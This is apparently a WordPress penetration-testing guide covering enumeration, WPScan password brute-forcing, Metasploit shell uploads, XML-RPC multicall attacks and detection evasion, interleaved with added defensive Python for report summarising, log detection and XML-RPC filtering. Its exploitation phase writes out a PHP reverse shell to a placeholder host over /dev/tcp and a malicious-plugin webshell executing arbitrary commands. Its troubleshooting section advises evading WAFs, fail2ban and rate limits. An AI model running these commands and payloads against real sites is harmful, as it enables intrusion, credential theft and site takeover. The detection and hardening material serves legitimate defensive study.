# WordPress Penetration Testing
> [!CAUTION]
> **⚠️ AUTHORIZATION REQUIRED - READ BEFORE PROCEEDING**
>
> This skill contains actual exploitation techniques and attack commands. Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is:
>
> - Illegal under computer fraud laws (CFAA, Computer Misuse Act, etc.)
> - Punishable by fines and imprisonment
> - Unethical and harmful to site owners
>
> Before using this skill, you MUST have:
>
> - Written authorization from the system owner
> - Defined scope specifying which systems can be tested
> - Rules of engagement document signed by both parties
> - Emergency contact information for the system owner
> - Insurance/liability coverage if testing professionally
>
> If you do not have written authorization, STOP NOW.
## Purpose

Conduct comprehensive security assessments of WordPress installations, including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.
## Prerequisites

### Required Tools

- WPScan (pre-installed in Kali Linux)
- Metasploit Framework
- Burp Suite or OWASP ZAP
- Nmap for initial discovery
- cURL or wget

### Required Knowledge

- WordPress architecture and structure
- Web application testing fundamentals
- HTTP protocol understanding
- Common web vulnerabilities (OWASP Top 10)

## Outputs and Deliverables

- WordPress Enumeration Report - Version, themes, plugins, users
- Vulnerability Assessment - Identified CVEs and misconfigurations
- Credential Assessment - Weak password findings
- Exploitation Proof - Shell access documentation
## Core Workflow

### Phase 1: WordPress Discovery

Identify WordPress installations:

```bash
# Check for WordPress indicators
curl -s http://target.com | grep -i wordpress
curl -s http://target.com | grep -i "wp-content"
curl -s http://target.com | grep -i "wp-includes"

# Check common WordPress paths
curl -I http://target.com/wp-login.php
curl -I http://target.com/wp-admin/
curl -I http://target.com/wp-content/
curl -I http://target.com/xmlrpc.php

# Check meta generator tag
curl -s http://target.com | grep "generator"

# Nmap WordPress detection
nmap -p 80,443 --script http-wordpress-enum target.com
```

Key WordPress files and directories:

- `/wp-admin/` - Admin dashboard
- `/wp-login.php` - Login page
- `/wp-content/` - Themes, plugins, uploads
- `/wp-includes/` - Core files
- `/xmlrpc.php` - XML-RPC interface
- `/wp-config.php` - Configuration (not accessible if secure)
- `/readme.html` - Version information
### Phase 2: Basic WPScan Enumeration

Comprehensive WordPress scanning with WPScan:

```bash
# Basic scan
wpscan --url http://target.com/wordpress/

# With API token (for vulnerability data)
wpscan --url http://target.com --api-token YOUR_API_TOKEN

# Aggressive detection mode
wpscan --url http://target.com --detection-mode aggressive

# Output to file
wpscan --url http://target.com -o results.txt

# JSON output
wpscan --url http://target.com -f json -o results.json

# Verbose output
wpscan --url http://target.com -v
```
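The JSON output is the form that feeds the Enumeration Report and Vulnerability Assessment deliverables. The following added Python summariser is not part of this skill or of WPScan; it assumes WPScan's JSON layout (top-level `version`, `plugins`, `themes` and `users` objects, each component carrying a `vulnerabilities` list with `title`, `fixed_in` and `references.cve`), and the embedded report is a constructed sample with placeholder CVE ids, not a real scan result.

```python
"""Summarise a WPScan JSON report (wpscan -f json -o results.json) into the
findings an assessment report needs: core version, vulnerable components, users.

Added example, not part of the original skill or of WPScan. The field layout is
assumed to match WPScan's JSON output; SAMPLE_REPORT is constructed.
"""
import json

# Constructed sample in the assumed WPScan JSON layout (placeholder values).
SAMPLE_REPORT = json.dumps({
    "target_url": "http://target.example/",
    "version": {
        "number": "5.8.1",
        "status": "insecure",
        "vulnerabilities": [
            {"title": "WordPress < 5.8.3 - Example Issue",
             "fixed_in": "5.8.3",
             "references": {"cve": ["CVE-XXXX-PLACEHOLDER"]}},
        ],
    },
    "plugins": {
        "example-gallery": {
            "version": {"number": "1.2.0"},
            "vulnerabilities": [
                {"title": "Example Gallery < 1.3.0 - Arbitrary File Upload",
                 "fixed_in": "1.3.0",
                 "references": {"cve": ["CVE-XXXX-PLACEHOLDER-2"]}},
            ],
        },
        "akismet": {"version": {"number": "4.2.1"}, "vulnerabilities": []},
    },
    "themes": {
        "twentytwentyone": {"version": {"number": "1.4"}, "vulnerabilities": []},
    },
    "users": {"admin": {"id": 1}, "editor": {"id": 2}},
})


def _vulns(component):
    """Flatten one component's vulnerability list into (title, fixed_in, cves)."""
    out = []
    for v in component.get("vulnerabilities") or []:
        cves = (v.get("references") or {}).get("cve") or []
        out.append((v.get("title", "?"), v.get("fixed_in"), list(cves)))
    return out


def summarise(report_json):
    """Return a dict with the core version, vulnerable components and users."""
    report = json.loads(report_json)
    findings = {"core_version": None, "core_vulns": [], "components": [], "users": []}

    core = report.get("version") or {}
    findings["core_version"] = core.get("number")
    findings["core_vulns"] = _vulns(core)

    for kind in ("plugins", "themes"):
        for slug, comp in (report.get(kind) or {}).items():
            vulns = _vulns(comp)
            if vulns:  # only components with at least one known issue
                findings["components"].append({
                    "kind": kind[:-1], "slug": slug,
                    "version": (comp.get("version") or {}).get("number"),
                    "vulns": vulns,
                })

    findings["users"] = sorted(report.get("users") or {})
    return findings


def render(findings):
    """Render the findings as the plain-text section of a report."""
    lines = [f"WordPress core: {findings['core_version'] or 'unknown'} "
             f"({len(findings['core_vulns'])} known issue(s))"]
    for title, fixed, cves in findings["core_vulns"]:
        lines.append(f"  - {title} [fixed in {fixed}] {' '.join(cves)}")
    for c in findings["components"]:
        lines.append(f"{c['kind']} {c['slug']} {c['version']}: {len(c['vulns'])} issue(s)")
        for title, fixed, cves in c["vulns"]:
            lines.append(f"  - {title} [fixed in {fixed}] {' '.join(cves)}")
    lines.append("Enumerated users: " + ", ".join(findings["users"]))
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(summarise(SAMPLE_REPORT)))
```

Components without any known issue are dropped from the summary so the report lists only what needs patching; the `fixed_in` value is the remediation target for each finding.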
### Phase 3: WordPress Version Detection

Identify WordPress version:

```bash
# WPScan version detection
wpscan --url http://target.com

# Manual version checks
curl -s http://target.com/readme.html | grep -i version
curl -s http://target.com/feed/ | grep -i generator
curl -s http://target.com | grep "?ver="

# Check meta generator
curl -s http://target.com | grep 'name="generator"'

# Check RSS feeds
curl -s http://target.com/feed/
curl -s http://target.com/comments/feed/
```

Version sources:

- Meta generator tag in HTML
- readme.html file
- RSS/Atom feeds
- JavaScript/CSS file versions
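The four sources above are also the checklist a site owner works through when removing version disclosure. The following added Python extractor (not code from this skill) reads the version from each source so that the leak can be confirmed before hardening and its absence confirmed afterwards; the HTML, feed and readme snippets are constructed, and `target.example` is a placeholder host.

```python
"""Pull the WordPress version out of the meta generator tag, the feed <generator>
element, ?ver= on core asset URLs and readme.html, so a defender can verify that
hardening (removing the generator tag, stripping ?ver=, deleting readme.html)
actually stopped the leak.

Added example, not code from the original skill. The snippets are constructed
and target.example is a placeholder host.
"""
import re
from collections import Counter

META_GENERATOR = re.compile(
    r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']WordPress\s*([\d.]+)', re.I)
FEED_GENERATOR = re.compile(
    r'<generator>\s*https?://wordpress\.org/\?v=([\d.]+)\s*</generator>', re.I)
# Only core assets under wp-includes/ or wp-admin/ carry the core version in ?ver=;
# plugin and theme assets carry their own version, so the match is scoped to core.
CORE_ASSET_VER = re.compile(r'/(?:wp-includes|wp-admin)/[^"\'\s]+\?ver=([\d.]+)', re.I)
README_VERSION = re.compile(r'Version\s+([\d.]+)', re.I)


def find_version_leaks(html="", feed="", readme=""):
    """Return {source: version} for every source that reveals the core version."""
    leaks = {}
    m = META_GENERATOR.search(html)
    if m:
        leaks["meta_generator"] = m.group(1)
    m = FEED_GENERATOR.search(feed)
    if m:
        leaks["feed_generator"] = m.group(1)
    # Bundled libraries (jQuery etc.) ship under wp-includes/ with their own
    # version string, so take the value most core assets agree on.
    versions = CORE_ASSET_VER.findall(html)
    if versions:
        leaks["asset_ver"] = Counter(versions).most_common(1)[0][0]
    m = README_VERSION.search(readme)
    if m:
        leaks["readme_html"] = m.group(1)
    return leaks


# Constructed responses from a site that leaks its version through every source.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.2.2" />
<link rel="stylesheet" href="http://target.example/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2" />
<script src="http://target.example/wp-content/plugins/example-gallery/js/gallery.js?ver=1.2.0"></script>
<script src="http://target.example/wp-includes/js/jquery/jquery.min.js?ver=3.6.4"></script>
<script src="http://target.example/wp-includes/js/wp-emoji-release.min.js?ver=6.2.2"></script>
</head><body></body></html>"""
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Target</title>
<generator>https://wordpress.org/?v=6.2.2</generator>
</channel></rss>"""
SAMPLE_README = ('<h1 id="logo"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" />'
                 '<br /> Version 6.2.2</h1>')
# The same site after hardening: no generator tag, no ?ver=, readme.html removed.
HARDENED_HTML = ('<html><head><link rel="stylesheet" '
                 'href="http://target.example/wp-includes/css/dist/block-library/style.min.css" />'
                 '</head><body></body></html>')

if __name__ == "__main__":
    print("before:", find_version_leaks(SAMPLE_HTML, SAMPLE_FEED, SAMPLE_README))
    print("after: ", find_version_leaks(HARDENED_HTML))
```

Running the extractor over the real responses (`curl -s` of the front page, `/feed/` and `/readme.html`) gives an empty dict only when all four sources are closed; a site that strips the generator tag but leaves `?ver=` on core scripts still reports `asset_ver`.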
### Phase 4: Theme Enumeration

Identify installed themes:

```bash
# Enumerate all themes
wpscan --url http://target.com -e at

# Enumerate vulnerable themes only
wpscan --url http://target.com -e vt

# Theme enumeration with aggressive detection
# (--plugins-detection only covers plugins; --detection-mode applies to themes too)
wpscan --url http://target.com -e at --detection-mode aggressive

# Manual theme detection
curl -s http://target.com | grep "wp-content/themes/"
curl -s http://target.com/wp-content/themes/
```

Theme vulnerability checks:

```bash
# Search for theme exploits
searchsploit wordpress theme <theme_name>

# Check theme version
curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
curl -s http://target.com/wp-content/themes/<theme>/readme.txt
```
### Phase 5: Plugin Enumeration

Identify installed plugins:

```bash
# Enumerate all plugins
wpscan --url http://target.com -e ap

# Enumerate vulnerable plugins only
wpscan --url http://target.com -e vp

# Aggressive plugin detection
wpscan --url http://target.com -e ap --plugins-detection aggressive

# Mixed detection mode
wpscan --url http://target.com -e ap --plugins-detection mixed

# Manual plugin discovery
curl -s http://target.com | grep "wp-content/plugins/"
curl -s http://target.com/wp-content/plugins/
```

Common vulnerable plugins to check:

```bash
# Search for plugin exploits
searchsploit wordpress plugin <plugin_name>
searchsploit wordpress mail-masta
searchsploit wordpress slideshow gallery
searchsploit wordpress reflex gallery

# Check plugin version
curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt
```
### Phase 6: User Enumeration

Discover WordPress users:

```bash
# WPScan user enumeration
wpscan --url http://target.com -e u

# Enumerate a specific range of author IDs
wpscan --url http://target.com -e u1-100

# Author ID enumeration (manual): ?author=N redirects to /author/<username>/,
# so follow the redirect (-L) before grepping for the author slug
for i in {1..20}; do
  curl -s -L "http://target.com/?author=$i" | grep -o 'author/[^/]*/'
done

# JSON API user enumeration (if enabled)
curl -s http://target.com/wp-json/wp/v2/users

# REST API user enumeration (larger page size)
curl -s "http://target.com/wp-json/wp/v2/users?per_page=100"

# Login error enumeration (error text differs for valid and invalid usernames)
curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php
```
### Phase 7: Comprehensive Enumeration

Run all enumeration modules:

```bash
# Enumerate everything (themes, plugins, users)
wpscan --url http://target.com -e at,ap,u

# Alternative comprehensive scan
wpscan --url http://target.com -e vp,vt,u,cb,dbe
```

Enumeration flags:

- `at` - All themes
- `vt` - Vulnerable themes
- `ap` - All plugins
- `vp` - Vulnerable plugins
- `u` - Users (1-10)
- `cb` - Config backups
- `dbe` - Database exports

```bash
# Full aggressive enumeration
wpscan --url http://target.com -e at,ap,u,cb,dbe \
  --detection-mode aggressive \
  --plugins-detection aggressive
```
### Phase 8: Password Attacks

Brute-force WordPress credentials:

```bash
# Single user brute-force
wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt

# Multiple users from file
wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt

# With password attack threads
wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50

# XML-RPC brute-force (faster, may bypass protection)
wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc

# Brute-force with throttling (milliseconds between requests)
wpscan --url http://target.com -U admin -P passwords.txt --throttle 500

# Create a targeted wordlist from the site's own content, then use it
cewl http://target.com -w wordlist.txt
wpscan --url http://target.com -U admin -P wordlist.txt
```

Password attack methods:

- `wp-login` - Standard login form
- `xmlrpc` - XML-RPC multicall (faster)
- `xmlrpc-multicall` - Multiple passwords per request
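Both the user enumeration in Phase 6 and the password attacks above leave a distinctive trail in the web server's access log: a run of `?author=N` probes from one client, requests to `/wp-json/wp/v2/users`, and bursts of POSTs to `wp-login.php` or `xmlrpc.php`. The following added Python detector is not part of this skill; the log lines are constructed in the combined log format with placeholder IPs, and the thresholds are assumed starting points to tune against real traffic.

```python
"""Flag WordPress enumeration and password-attack traffic in a web server access log.

Added example, not part of the original skill. Log lines are constructed in the
combined log format with placeholder IPs; the thresholds are assumed starting
points to tune against real traffic.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed thresholds (not from the page): tune to the site's normal traffic.
AUTHOR_IDS_MIN = 5      # distinct ?author= ids probed from one IP
LOGIN_POSTS_MIN = 20    # POST /wp-login.php from one IP within WINDOW_SECS
XMLRPC_POSTS_MIN = 10   # POST /xmlrpc.php from one IP within WINDOW_SECS
WINDOW_SECS = 60


def parse(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def _burst(times, n, window):
    """True if some window-second span contains at least n of the timestamps."""
    times = sorted(times)
    return any((times[i + n - 1] - times[i]).total_seconds() <= window
               for i in range(len(times) - n + 1))


def detect(lines):
    """Return sorted (ip, finding, count) tuples for suspicious clients."""
    author_ids = defaultdict(set)
    rest_users = set()
    login_posts = defaultdict(list)
    xmlrpc_posts = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        m = re.search(r'[?&]author=(\d+)', path)
        if m:
            author_ids[ip].add(m.group(1))
        if path.startswith("/wp-json/wp/v2/users"):
            rest_users.add(ip)
        if rec["method"] == "POST" and path.startswith("/wp-login.php"):
            login_posts[ip].append(rec["ts"])
        if rec["method"] == "POST" and path.startswith("/xmlrpc.php"):
            xmlrpc_posts[ip].append(rec["ts"])

    alerts = [(ip, "author-id enumeration", len(ids))
              for ip, ids in author_ids.items() if len(ids) >= AUTHOR_IDS_MIN]
    alerts += [(ip, "REST API user listing", 1) for ip in rest_users]
    alerts += [(ip, "wp-login.php brute force", len(ts))
               for ip, ts in login_posts.items() if _burst(ts, LOGIN_POSTS_MIN, WINDOW_SECS)]
    alerts += [(ip, "xmlrpc.php password attack", len(ts))
               for ip, ts in xmlrpc_posts.items() if _burst(ts, XMLRPC_POSTS_MIN, WINDOW_SECS)]
    return sorted(alerts)


def _line(ip, method, path, status, second):
    """Build one constructed log line (sample data, not real traffic)."""
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


# Constructed sample: one enumerating client, two password-attack clients and
# one legitimate visitor who logs in once.
SAMPLE_LOG = (
    [_line("203.0.113.5", "GET", f"/?author={i}", 301, i) for i in range(1, 11)]
    + [_line("203.0.113.5", "GET", "/wp-json/wp/v2/users?per_page=100", 200, 12)]
    + [_line("198.51.100.7", "POST", "/wp-login.php", 200, s) for s in range(25)]
    + [_line("198.51.100.9", "POST", "/xmlrpc.php", 200, s) for s in range(12)]
    + [_line("192.0.2.44", "GET", "/2024/03/hello-world/", 200, 30),
       _line("192.0.2.44", "POST", "/wp-login.php", 302, 31)]
)

if __name__ == "__main__":
    for ip, finding, count in detect(SAMPLE_LOG):
        print(f"{ip:15} {finding:28} {count}")
```

The XML-RPC threshold is deliberately lower than the login-form one because a single `xmlrpc.php` POST can carry many credential pairs via `system.multicall`; counting requests alone understates that attack, which is why the counts here are best paired with response sizes or a body-level filter. A single `301` for `?author=N` is normal (it is how WordPress resolves author archives); the signal is the sequential sweep from one client.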
### Phase 9: Vulnerability Exploitation

#### Metasploit Shell Upload

After obtaining credentials:

```bash
# Start Metasploit
msfconsole
```

```
# Admin shell upload (inside msfconsole)
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS target.com
set USERNAME admin
set PASSWORD jessica
set TARGETURI /wordpress
set LHOST <your_ip>
exploit
```

#### Plugin Exploitation

```
# Slideshow Gallery exploit (inside msfconsole)
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOSTS target.com
set TARGETURI /wordpress
set USERNAME admin
set PASSWORD jessica
set LHOST <your_ip>
exploit

# Search for WordPress exploits
search type:exploit platform:php wordpress
```

#### Manual Exploitation

Theme/plugin editor (with admin access):

- Navigate to Appearance > Theme Editor
- Edit `404.php` or `functions.php`
- Add a PHP reverse shell:

```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
```

- Or use a weevely backdoor
- Access via: `http://target.com/wp-content/themes/theme_name/404.php`

Plugin upload method:

```bash
# Create malicious plugin
cat > malicious.php << 'EOF'
<?php
/*
Plugin Name: Malicious Plugin
Description: Security Testing
Version: 1.0
*/
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
EOF

# Zip and upload via Plugins > Add New > Upload Plugin
zip malicious.zip malicious.php

# Access webshell
curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"
```
### Phase 10: Advanced Techniques

#### XML-RPC Exploitation

```bash
# Check if XML-RPC is enabled
curl -X POST http://target.com/xmlrpc.php

# List available methods
curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php

# Brute-force via XML-RPC multicall
cat > xmlrpc_brute.xml << 'EOF'
<?xml version="1.0"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param><value><array><data>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>admin</string></value>
          <value><string>password1</string></value>
        </data></array></value></member>
      </struct></value>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>admin</string></value>
          <value><string>password2</string></value>
        </data></array></value></member>
      </struct></value>
    </data></array></value></param>
  </params>
</methodCall>
EOF

curl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php
```
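The multicall request above is what a defender needs to recognise in front of `xmlrpc.php`. The following added Python pre-filter is not part of this skill: it decodes a `system.multicall` body and blocks it when it bundles credential-bearing calls. The set of methods treated as credential-bearing and their argument positions are assumptions (most `wp.*` methods take `blog_id, username, password`; `wp.getUsersBlogs` takes `username, password`) to check against the WordPress version in use; the request bodies are constructed samples.

```python
"""WAF-style pre-filter for xmlrpc.php: decode a system.multicall request body
and block it when it bundles credential-bearing calls.

Added example, not part of the original skill. The credential-bearing methods
and their argument positions are assumptions; verify against your WordPress
version. Request bodies below are constructed samples.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict


def _decode(value_el):
    """Decode an XML-RPC <value> element into a Python object (subset of the spec)."""
    child = next(iter(value_el), None)
    if child is None:                       # untyped <value>text</value> is a string
        return (value_el.text or "").strip()
    tag = child.tag
    if tag in ("string", "dateTime.iso8601", "base64"):
        return child.text or ""
    if tag in ("int", "i4"):
        return int(child.text)
    if tag == "boolean":
        return (child.text or "").strip() == "1"
    if tag == "double":
        return float(child.text)
    if tag == "array":
        data = child.find("data")
        return [_decode(v) for v in data.findall("value")] if data is not None else []
    if tag == "struct":
        out = {}
        for member in child.findall("member"):
            val = member.find("value")
            out[member.findtext("name")] = _decode(val) if val is not None else None
        return out
    return child.text


def _credentials(method, args):
    """Return (username, password) if this call carries credentials, else None."""
    if method == "wp.getUsersBlogs" and len(args) >= 2:
        return str(args[0]), str(args[1])
    if method.startswith("wp.") and len(args) >= 3:   # assumed (blog_id, username, password)
        return str(args[1]), str(args[2])
    return None


def inspect_xmlrpc(body, max_auth_calls=3):
    """Classify an XML-RPC request body.

    Returns ('reject', reason) for unparseable input, ('allow', method) for a
    non-multicall or a harmless multicall, and ('block', detail) when a multicall
    nests another multicall, carries more than max_auth_calls credential-bearing
    calls, or tries several passwords for one username.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "reject", "malformed XML"
    if root.tag != "methodCall":
        return "reject", "not a methodCall"
    method = (root.findtext("methodName") or "").strip()
    if method != "system.multicall":
        return "allow", method
    params = [_decode(v) for v in root.findall("params/param/value")]
    calls = params[0] if params and isinstance(params[0], list) else []
    attempts = defaultdict(set)            # username -> distinct passwords seen
    auth_calls = 0
    for call in calls:
        if not isinstance(call, dict):
            continue
        name = str(call.get("methodName", ""))
        args = call.get("params") or []
        if name == "system.multicall":
            return "block", {"reason": "nested multicall"}
        creds = _credentials(name, args)
        if creds:
            auth_calls += 1
            attempts[creds[0]].add(creds[1])
    detail = {"calls": len(calls), "auth_calls": auth_calls,
              "users": {u: len(p) for u, p in attempts.items()}}
    if auth_calls > max_auth_calls or any(n > 1 for n in detail["users"].values()):
        return "block", detail
    return "allow", method


# Constructed bodies: the two-password multicall from the skill above, and one
# ordinary single login call that should pass.
MULTICALL_BRUTE = """<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
 <value><struct>
  <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
  <member><name>params</name><value><array><data>
   <value><string>admin</string></value><value><string>password1</string></value>
  </data></array></value></member>
 </struct></value>
 <value><struct>
  <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
  <member><name>params</name><value><array><data>
   <value><string>admin</string></value><value><string>password2</string></value>
  </data></array></value></member>
 </struct></value>
</data></array></value></param></params></methodCall>"""

SINGLE_LOGIN = """<?xml version="1.0"?>
<methodCall><methodName>wp.getUsersBlogs</methodName><params>
 <param><value><string>admin</string></value></param>
 <param><value><string>correct-horse</string></value></param>
</params></methodCall>"""

if __name__ == "__main__":
    print(inspect_xmlrpc(MULTICALL_BRUTE))
    print(inspect_xmlrpc(SINGLE_LOGIN))
```

Blocking on "several passwords for one username inside a single request" catches the multicall amplification regardless of which authenticated method is used, while single calls still reach the normal login rate limit. If the site does not need XML-RPC at all (no Jetpack, no mobile-app publishing), disabling the endpoint outright is the simpler control.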
#### Scanning Through Proxy

```bash
# Use Tor proxy
wpscan --url http://target.com --proxy socks5://127.0.0.1:9050

# HTTP proxy
wpscan --url http://target.com --proxy http://127.0.0.1:8080

# Burp Suite proxy
wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks
```

#### HTTP Authentication

```bash
# Basic authentication
wpscan --url http://target.com --http-auth admin:password

# Force SSL/TLS
wpscan --url https://target.com --disable-tls-checks
```
## Quick Reference

### WPScan Enumeration Flags

| Flag | Description |
|------|-------------|
| `-e at` | All themes |
| `-e vt` | Vulnerable themes |
| `-e ap` | All plugins |
| `-e vp` | Vulnerable plugins |
| `-e u` | Users (1-10) |
| `-e cb` | Config backups |
| `-e dbe` | Database exports |

### Common WordPress Paths

| Path | Purpose |
|------|---------|
| `/wp-admin/` | Admin dashboard |
| `/wp-login.php` | Login page |
| `/wp-content/uploads/` | User uploads |
| `/wp-includes/` | Core files |
| `/xmlrpc.php` | XML-RPC API |
| `/wp-json/` | REST API |

### WPScan Command Examples

| Purpose | Command |
|---------|---------|
| Basic scan | `wpscan --url http://target.com` |
| All enumeration | `wpscan --url http://target.com -e at,ap,u` |
| Password attack | `wpscan --url http://target.com -U admin -P pass.txt` |
| Aggressive | `wpscan --url http://target.com --detection-mode aggressive` |
## Constraints and Limitations

### Legal Considerations

- Obtain written authorization before testing
- Stay within defined scope
- Document all testing activities
- Follow responsible disclosure

### Technical Limitations

- WAF may block scanning
- Rate limiting may prevent brute-force
- Some plugins may have false negatives
- XML-RPC may be disabled

### Detection Evasion

- Use random user agents: `--random-user-agent`
- Throttle requests: `--throttle 1000`
- Use proxy rotation
- Avoid aggressive modes on monitored sites
## Troubleshooting

### WPScan Shows No Vulnerabilities

Solutions:

- Use API token for vulnerability database
- Try aggressive detection mode
- Check for WAF blocking scans
- Verify WordPress is actually installed

### Brute-Force Blocked

Solutions:

- Use XML-RPC method instead of wp-login
- Add throttling: `--throttle 500`
- Use different user agents
- Check for IP blocking/fail2ban

### Cannot Access Admin Panel

Solutions:

- Verify credentials are correct
- Check for two-factor authentication
- Look for IP whitelist restrictions
- Check for login URL changes (security plugins)